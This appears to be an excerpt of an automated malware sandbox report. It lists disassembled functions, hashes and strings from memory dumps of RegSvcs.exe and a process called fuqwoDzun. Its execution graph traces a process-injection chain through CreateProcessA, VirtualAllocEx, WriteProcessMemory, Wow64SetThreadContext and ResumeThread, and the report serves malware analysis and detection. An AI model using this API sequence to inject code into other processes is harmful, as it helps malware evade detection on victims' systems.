                                                        • ExecuteOptions, xrefs: 016946A0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: 81748505eede7396846bc77844bfd639d9d9dbc2a6e5a79c5f8176d04d01ddf4
                                                        • Instruction ID: f3310e1e7e8f608aa82388ddabfb9bc1c68b09dff8a519509402f7998e2365d1
                                                        • Opcode Fuzzy Hash: 81748505eede7396846bc77844bfd639d9d9dbc2a6e5a79c5f8176d04d01ddf4
                                                        • Instruction Fuzzy Hash: 29510A31600219ABEF11ABA8EC95FBE77ADEF15300F44009DDA05A72C1EB71DE468F65
                                                        Function 016F6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                        • Instruction ID: 5b06a4760e07902274279e7315a06d81189b615bc4b47b6dd06d35dc34a8fee0
                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                        • Instruction Fuzzy Hash: E8021671508342AFD305CF18C894A6BBBE6FFC8704F04892DFA955B264DB31E905CB56
                                                        Function 0166B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction ID: 7e6c579203cbbf6e7dac689b0676e96cd63d7393096f6ad8fc0b519d328bd646
                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction Fuzzy Hash: EF81BC30B0525ADEEF258E68CC917BEBFAAAF45320F18411AD961E7391C73898418B65
                                                        Function 016D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        • Opcode ID: ff9d13505efff531388e71bbd723e7cf8e02035a98879faaaac71cf3b2a04125
                                                        • Instruction ID: 54bae808f98891ac4f5ffdb8972747ea4e9e2e1ef3f8917c43491ddd80d68484
                                                        • Opcode Fuzzy Hash: ff9d13505efff531388e71bbd723e7cf8e02035a98879faaaac71cf3b2a04125
                                                        • Instruction Fuzzy Hash: 5721517AE00119ABDB11DE79CC50ABEBBF9EF54651F08411EEA15E3200E730DA158BA1
                                                        Function 0164F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016902E7
                                                        • RTL: Re-Waiting, xrefs: 0169031E
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016902BD
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: ede730f6b424ee3d23fcca0680c96f4c57798f388e9f61b0d04bffd2c63d18da
                                                        • Instruction ID: 581de54478d748f720d2ed469482b438c5e15d146d55fea0951cd7f1c0f84111
                                                        • Opcode Fuzzy Hash: ede730f6b424ee3d23fcca0680c96f4c57798f388e9f61b0d04bffd2c63d18da
                                                        • Instruction Fuzzy Hash: 1EE1AC706087429FEB25CF2CCC84B2ABBE9AB85324F144A9DF5A58B3D1D774D845CB42
                                                        Function 0165BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 01697BAC
                                                        • RTL: Resource at %p, xrefs: 01697B8E
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01697B7F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: 37c71c85a01c7d2c353c794a44ee3679c150a21345beea95a48fbf0f03b8f4c7
                                                        • Instruction ID: 71dbad531b24956e28806ce13c88416cb21ad28005f482ecf0aee26d1a35915d
                                                        • Opcode Fuzzy Hash: 37c71c85a01c7d2c353c794a44ee3679c150a21345beea95a48fbf0f03b8f4c7
                                                        • Instruction Fuzzy Hash: BD41E2317007029FDB25CE2DDC40B6AB7EAEF98710F100A1DE95A9B380DB31E8058F95
                                                        Function 0165B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0169728C
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 016972C1
                                                        • RTL: Resource at %p, xrefs: 016972A3
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01697294
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: 54ab18484dc5572d79ebe932786b1ba062e5a24c07cb4bfbb56bc6ea30a41664
                                                        • Instruction ID: a58019a71875c8df013bb04d3e60e89a85a459002bde078bdf8113180cd98075
                                                        • Opcode Fuzzy Hash: 54ab18484dc5572d79ebe932786b1ba062e5a24c07cb4bfbb56bc6ea30a41664
                                                        • Instruction Fuzzy Hash: 7F41FF31611206ABCB21CE69CC81B6ABBAAFF94710F14465DFD55EB380DB20E8528BD5
                                                        Function 016D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: b3b59becaf48e5cac8cb5c4e0411b9b652b8c16af2df4b35077ad59d9c95e69d
                                                        • Instruction ID: a9ca8117f4434ac0ad5d50d9d1f46dd98f7ae43ef23e71c0bd84c65ea67bb70d
                                                        • Opcode Fuzzy Hash: b3b59becaf48e5cac8cb5c4e0411b9b652b8c16af2df4b35077ad59d9c95e69d
                                                        • Instruction Fuzzy Hash: DB318172A002199FDB20DF2DCC50BEEB7F9EB44610F45455EED49E3200EF30AA548BA0
                                                        Function 01667D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction ID: 2d5b6f16d1d83535f5a6ab1ad42409fe2206da714652ac694a9376635612f62d
                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction Fuzzy Hash: 3891B271E0020A9BEB24DF6DCC80ABEBBBDAF84728F14451AE955E73C0D7349941CB51
                                                        Function 01629126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: 3211f14d5238881fe04c9304802790714eb01125b0116dcfdd12e549fe93c1a5
                                                        • Instruction ID: ae7f058f65aced2930810460b94554d605f0b177b4752f2d93c2770d633d53ea
                                                        • Opcode Fuzzy Hash: 3211f14d5238881fe04c9304802790714eb01125b0116dcfdd12e549fe93c1a5
                                                        • Instruction Fuzzy Hash: 4C812971D002799BDB31DB54CC54BEABBB8AF48714F1041EAEA19B7280D7709E85CFA4
                                                        Function 016ACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 016ACFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8
                                                        • String ID: @$@4_w@4_w
                                                        • API String ID: 4062629308-713214301
                                                        • Opcode ID: 8eaed43bff176376fcdb34a48ec721473e9e7d57f75f5cc7d96a361d9b92ed50
                                                        • Instruction ID: 28671b3321d8225b4c0f4480462f6c7faf9a73811461f129cb5004a0e4104fb0
                                                        • Opcode Fuzzy Hash: 8eaed43bff176376fcdb34a48ec721473e9e7d57f75f5cc7d96a361d9b92ed50
                                                        • Instruction Fuzzy Hash: 58419AB5940215DFDB219FA9CD40AAEBBB9FF54B10F00802EEA05EB354D774D801CB65

                                                        Execution Graph

                                                        Execution Coverage:10.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:182
                                                        Total number of Limit Nodes:8
                                                        execution_graph 20072 a94668 20073 a94672 20072->20073 20075 a94758 20072->20075 20076 a9477d 20075->20076 20080 a94859 20076->20080 20084 a94868 20076->20084 20081 a9488f 20080->20081 20083 a9496c 20081->20083 20088 a944e0 20081->20088 20086 a9488f 20084->20086 20085 a9496c 20085->20085 20086->20085 20087 a944e0 CreateActCtxA 20086->20087 20087->20085 20089 a958f8 CreateActCtxA 20088->20089 20091 a959bb 20089->20091 20091->20091 20096 a9dec8 20097 a9dedc 20096->20097 20099 a9df01 20097->20099 20100 a9d180 20097->20100 20101 a9e0a8 LoadLibraryExW 20100->20101 20103 a9e121 20101->20103 20103->20099 20092 a9de20 20093 a9de68 GetModuleHandleW 20092->20093 20094 a9de62 20092->20094 20095 a9de95 20093->20095 20094->20093 20104 69184f8 20105 6918683 20104->20105 20107 691851e 20104->20107 20107->20105 20108 6916a40 20107->20108 20109 6918778 PostMessageW 20108->20109 20111 69187e4 20109->20111 20111->20107 20112 69159fe 20114 69156fc 20112->20114 20113 6915889 20114->20113 20118 6917310 20114->20118 20134 6917386 20114->20134 20151 6917320 20114->20151 20119 6917314 20118->20119 20120 6917342 20119->20120 20167 6917c67 20119->20167 20175 6917924 20119->20175 20184 6917e41 20119->20184 20192 6917a3e 20119->20192 20200 691799b 20119->20200 20205 6917919 20119->20205 20216 6917bd4 20119->20216 20220 6917890 20119->20220 20228 69177ee 20119->20228 20234 691794d 20119->20234 20242 691776a 20119->20242 20247 6917e88 20119->20247 20252 69179c7 20119->20252 20120->20114 20135 6917314 20134->20135 20137 6917389 20134->20137 20136 6917342 20135->20136 20138 6917890 2 API calls 20135->20138 20139 6917bd4 2 API calls 20135->20139 20140 6917919 4 API calls 20135->20140 20141 691799b 2 API calls 20135->20141 20142 6917a3e 2 API calls 20135->20142 20143 6917e41 2 API calls 20135->20143 20144 6917924 4 API calls 20135->20144 20145 6917c67 2 API calls 20135->20145 20146 69179c7 2 API calls 20135->20146 20147 6917e88 2 API calls 20135->20147 20148 691776a 2 API calls 20135->20148 20149 691794d 2 API calls 20135->20149 20150 69177ee 2 API calls 20135->20150 20136->20114 20137->20114 20138->20136 20139->20136 20140->20136 20141->20136 20142->20136 20143->20136 20144->20136 20145->20136 20146->20136 20147->20136 20148->20136 20149->20136 20150->20136 20152 691733a 20151->20152 20153 6917890 2 API calls 20152->20153 20154 6917bd4 2 API calls 20152->20154 20155 6917919 4 API calls 20152->20155 20156 6917342 20152->20156 20157 691799b 2 API calls 20152->20157 20158 6917a3e 2 API calls 20152->20158 20159 6917e41 2 API calls 20152->20159 20160 6917924 4 API calls 20152->20160 20161 6917c67 2 API calls 20152->20161 20162 69179c7 2 API calls 20152->20162 20163 6917e88 2 API calls 20152->20163 20164 691776a 2 API calls 20152->20164 20165 691794d 2 API calls 20152->20165 20166 69177ee 2 API calls 20152->20166 20153->20156 20154->20156 20155->20156 20156->20114 20157->20156 20158->20156 20159->20156 20160->20156 20161->20156 20162->20156 20163->20156 20164->20156 20165->20156 20166->20156 20168 691789c 20167->20168 20169 69178b4 20168->20169 20170 6917afc 20168->20170 20257 6915050 20168->20257 20261 6915058 20168->20261 20169->20120 20171 6915050 WriteProcessMemory 20169->20171 20172 6915058 WriteProcessMemory 20169->20172 20170->20120 20171->20170 20172->20170 20176 6917931 20175->20176 20177 6917c18 20175->20177 20273 6914ec0 20176->20273 20277 6914eb9 20176->20277 20178 69181df 20177->20178 20265 6914e10 20177->20265 20269 6914e09 20177->20269 20179 6917eb7 20186 691789c 20184->20186 20185 69178b4 20185->20120 20188 6915050 WriteProcessMemory 20185->20188 20189 6915058 WriteProcessMemory 20185->20189 20186->20184 20186->20185 20187 6917afc 20186->20187 20190 6915050 WriteProcessMemory 20186->20190 20191 6915058 WriteProcessMemory 20186->20191 20187->20120 20188->20187 20189->20187 20190->20186 20191->20186 20193 691789c 20192->20193 20194 69178b4 20193->20194 20195 6917afc 20193->20195 20196 6915050 WriteProcessMemory 20193->20196 20197 6915058 WriteProcessMemory 20193->20197 20194->20120 20198 6915050 WriteProcessMemory 20194->20198 20199 6915058 WriteProcessMemory 20194->20199 20195->20120 20196->20193 20197->20193 20198->20195 20199->20195 20201 6918128 20200->20201 20203 6914ec0 Wow64SetThreadContext 20201->20203 20204 6914eb9 Wow64SetThreadContext 20201->20204 20202 6918146 20203->20202 20204->20202 20206 6917a61 20205->20206 20207 691789c 20205->20207 20281 6914f90 20206->20281 20285 6914f98 20206->20285 20208 6917afc 20207->20208 20209 69178b4 20207->20209 20210 6915050 WriteProcessMemory 20207->20210 20211 6915058 WriteProcessMemory 20207->20211 20208->20120 20209->20120 20212 6915050 WriteProcessMemory 20209->20212 20213 6915058 WriteProcessMemory 20209->20213 20210->20207 20211->20207 20212->20208 20213->20208 20289 6915140 20216->20289 20293 6915148 20216->20293 20217 6917bf9 20223 691789c 20220->20223 20221 6917afc 20221->20120 20222 69178b4 20222->20120 20226 6915050 WriteProcessMemory 20222->20226 20227 6915058 WriteProcessMemory 20222->20227 20223->20221 20223->20222 20224 6915050 WriteProcessMemory 20223->20224 20225 6915058 WriteProcessMemory 20223->20225 20224->20223 20225->20223 20226->20221 20227->20221 20230 6917780 20228->20230 20229 69182bb 20229->20120 20230->20229 20297 69152e0 20230->20297 20301 69152d7 20230->20301 20236 691789c 20234->20236 20235 6917afc 20235->20120 20236->20235 20237 69178b4 20236->20237 20238 6915050 WriteProcessMemory 20236->20238 20239 6915058 WriteProcessMemory 20236->20239 20237->20120 20240 6915050 WriteProcessMemory 20237->20240 20241 6915058 WriteProcessMemory 20237->20241 20238->20236 20239->20236 20240->20235 20241->20235 20243 6917796 20242->20243 20245 69152e0 CreateProcessA 20243->20245 20246 69152d7 CreateProcessA 20243->20246 20244 6917874 20245->20244 20246->20244 20248 6917e8e 20247->20248 20250 6914e10 ResumeThread 20248->20250 20251 6914e09 ResumeThread 20248->20251 20249 6917eb7 20250->20249 20251->20249 20253 69179e6 20252->20253 20255 6915050 WriteProcessMemory 20253->20255 20256 6915058 WriteProcessMemory 20253->20256 20254 6917a16 20254->20120 20255->20254 20256->20254 20258 6915054 WriteProcessMemory 20257->20258 20260 69150f7 20258->20260 20260->20168 20262 69150a0 WriteProcessMemory 20261->20262 20264 69150f7 20262->20264 20264->20168 20266 6914e50 ResumeThread 20265->20266 20268 6914e81 20266->20268 20268->20179 20270 6914e0c ResumeThread 20269->20270 20272 6914e81 20270->20272 20272->20179 20274 6914ec2 Wow64SetThreadContext 20273->20274 20276 6914f4d 20274->20276 20276->20177 20278 6914ebc Wow64SetThreadContext 20277->20278 20280 6914f4d 20278->20280 20280->20177 20282 6914f98 VirtualAllocEx 20281->20282 20284 6915015 20282->20284 20284->20207 20286 6914fd8 VirtualAllocEx 20285->20286 20288 6915015 20286->20288 20288->20207 20290 6915144 ReadProcessMemory 20289->20290 20292 69151d7 20290->20292 20292->20217 20294 691514a ReadProcessMemory 20293->20294 20296 69151d7 20294->20296 20296->20217 20298 69152e2 CreateProcessA 20297->20298 20300 691552b 20298->20300 20302 69152dc CreateProcessA 20301->20302 20304 691552b 20302->20304

                                                        Executed Functions

                                                        Function 069152D7 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 69152d7-69152da 1 69152e2-6915375 0->1 2 69152dc-69152e1 0->2 5 6915377-6915381 1->5 6 69153ae-69153ce 1->6 2->1 5->6 7 6915383-6915385 5->7 13 69153d0-69153da 6->13 14 6915407-6915436 6->14 8 6915387-6915391 7->8 9 69153a8-69153ab 7->9 11 6915393 8->11 12 6915395-69153a4 8->12 9->6 11->12 12->12 15 69153a6 12->15 13->14 16 69153dc-69153de 13->16 22 6915438-6915442 14->22 23 691546f-6915529 CreateProcessA 14->23 15->9 17 6915401-6915404 16->17 18 69153e0-69153ea 16->18 17->14 20 69153ec 18->20 21 69153ee-69153fd 18->21 20->21 21->21 24 69153ff 21->24 22->23 25 6915444-6915446 22->25 34 6915532-69155b8 23->34 35 691552b-6915531 23->35 24->17 27 6915469-691546c 25->27 28 6915448-6915452 25->28 27->23 29 6915454 28->29 30 6915456-6915465 28->30 29->30 30->30 32 6915467 30->32 32->27 45 69155c8-69155cc 34->45 46 69155ba-69155be 34->46 35->34 48 69155dc-69155e0 45->48 49 69155ce-69155d2 45->49 46->45 47 69155c0 46->47 47->45 51 69155f0-69155f4 48->51 52 69155e2-69155e6 48->52 49->48 50 69155d4 49->50 50->48 54 6915606-691560d 51->54 55 69155f6-69155fc 51->55 52->51 53 69155e8 52->53 53->51 56 6915624 54->56 57 691560f-691561e 54->57 55->54 59 6915625 56->59 57->56 59->59
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06915516
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: cafc4d24758b533fff35a9ab80385f9e708ddbf183994568a0120b73d5bfe48a
                                                        • Instruction ID: cf03de9e95b4be838701e2d6bfe835fc28bb423b7dd7c2000ff0eca540f8c315
                                                        • Opcode Fuzzy Hash: cafc4d24758b533fff35a9ab80385f9e708ddbf183994568a0120b73d5bfe48a
                                                        • Instruction Fuzzy Hash: BBA13EB1D0021DCFEB60CF68C8417EDBBB6AF84310F268569E819AB684D7749985CF91
                                                        Function 069152E0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 60 69152e0-6915375 63 6915377-6915381 60->63 64 69153ae-69153ce 60->64 63->64 65 6915383-6915385 63->65 71 69153d0-69153da 64->71 72 6915407-6915436 64->72 66 6915387-6915391 65->66 67 69153a8-69153ab 65->67 69 6915393 66->69 70 6915395-69153a4 66->70 67->64 69->70 70->70 73 69153a6 70->73 71->72 74 69153dc-69153de 71->74 80 6915438-6915442 72->80 81 691546f-6915529 CreateProcessA 72->81 73->67 75 6915401-6915404 74->75 76 69153e0-69153ea 74->76 75->72 78 69153ec 76->78 79 69153ee-69153fd 76->79 78->79 79->79 82 69153ff 79->82 80->81 83 6915444-6915446 80->83 92 6915532-69155b8 81->92 93 691552b-6915531 81->93 82->75 85 6915469-691546c 83->85 86 6915448-6915452 83->86 85->81 87 6915454 86->87 88 6915456-6915465 86->88 87->88 88->88 90 6915467 88->90 90->85 103 69155c8-69155cc 92->103 104 69155ba-69155be 92->104 93->92 106 69155dc-69155e0 103->106 107 69155ce-69155d2 103->107 104->103 105 69155c0 104->105 105->103 109 69155f0-69155f4 106->109 110 69155e2-69155e6 106->110 107->106 108 69155d4 107->108 108->106 112 6915606-691560d 109->112 113 69155f6-69155fc 109->113 110->109 111 69155e8 110->111 111->109 114 6915624 112->114 115 691560f-691561e 112->115 113->112 117 6915625 114->117 115->114 117->117
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06915516
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: a79bdad28c091d128665c49d70dacbac7298e7ed6a7f4e22c9e25409710fdc58
                                                        • Instruction ID: cdd356ab2fc60a814052eec359b8cb911d41b367af8aa557cbfac6548a7961ce
                                                        • Opcode Fuzzy Hash: a79bdad28c091d128665c49d70dacbac7298e7ed6a7f4e22c9e25409710fdc58
                                                        • Instruction Fuzzy Hash: 33914DB1D0031DCFEB60CF68C8417EDBBB6AF84310F268569D819AB284DB749985CF91
                                                        Function 00A958ED Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 118 a958ed-a959b9 CreateActCtxA 120 a959bb-a959c1 118->120 121 a959c2-a95a1c 118->121 120->121 128 a95a2b-a95a2f 121->128 129 a95a1e-a95a21 121->129 130 a95a31-a95a3d 128->130 131 a95a40 128->131 129->128 130->131 133 a95a41 131->133 133->133
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00A959A9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1511703886.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_a90000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 6edb07de820fd79c989d3482a706b53821085490d7afbd37e5eaa7244ace7ce3
                                                        • Instruction ID: cae7a28cc72afa1973c08ede23738bd49d6bb430cd60456ea2c43685ff8a65e6
                                                        • Opcode Fuzzy Hash: 6edb07de820fd79c989d3482a706b53821085490d7afbd37e5eaa7244ace7ce3
                                                        • Instruction Fuzzy Hash: 2B41D270D04718CFDB25CFA9C885B9EBBF1BF49304F20816AD459AB291D7B1694ACF90
                                                        Function 00A944E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 134 a944e0-a959b9 CreateActCtxA 137 a959bb-a959c1 134->137 138 a959c2-a95a1c 134->138 137->138 145 a95a2b-a95a2f 138->145 146 a95a1e-a95a21 138->146 147 a95a31-a95a3d 145->147 148 a95a40 145->148 146->145 147->148 150 a95a41 148->150 150->150
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00A959A9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1511703886.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_a90000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: f947c72a4ba06655ae912cbe2bd7ddd38dd107d2763f575c1251b8f6600bb556
                                                        • Instruction ID: 3ea62978a1ffce3e7b26f7792aa49f470ebd263e7ff9ab2d3a9ac313bd3e3305
                                                        • Opcode Fuzzy Hash: f947c72a4ba06655ae912cbe2bd7ddd38dd107d2763f575c1251b8f6600bb556
                                                        • Instruction Fuzzy Hash: 6D41CFB0D0071DCBDB24DFA9C885B9EBBF5BF49304F20816AD418AB251DBB16945CF90
                                                        Function 06915050 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 151 6915050-6915052 152 6915054-6915059 151->152 153 691505a-69150a6 151->153 152->153 155 69150b6-69150f5 WriteProcessMemory 153->155 156 69150a8-69150b4 153->156 158 69150f7-69150fd 155->158 159 69150fe-691512e 155->159 156->155 158->159
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069150E8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 4a90aeef45078e836aef69e6c2d93b095cd4abd854ef9ecf43f60021de2225d1
                                                        • Instruction ID: 8c823cc10bc1796ba047c6d3b10d6c7a0a764b0e7985e04a638db66178066e75
                                                        • Opcode Fuzzy Hash: 4a90aeef45078e836aef69e6c2d93b095cd4abd854ef9ecf43f60021de2225d1
                                                        • Instruction Fuzzy Hash: 282137B5D003099FDB50CFA9C8857EEBBF5FB48314F21842AE958A7241C7B59941CBA0
                                                        Function 06915140 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
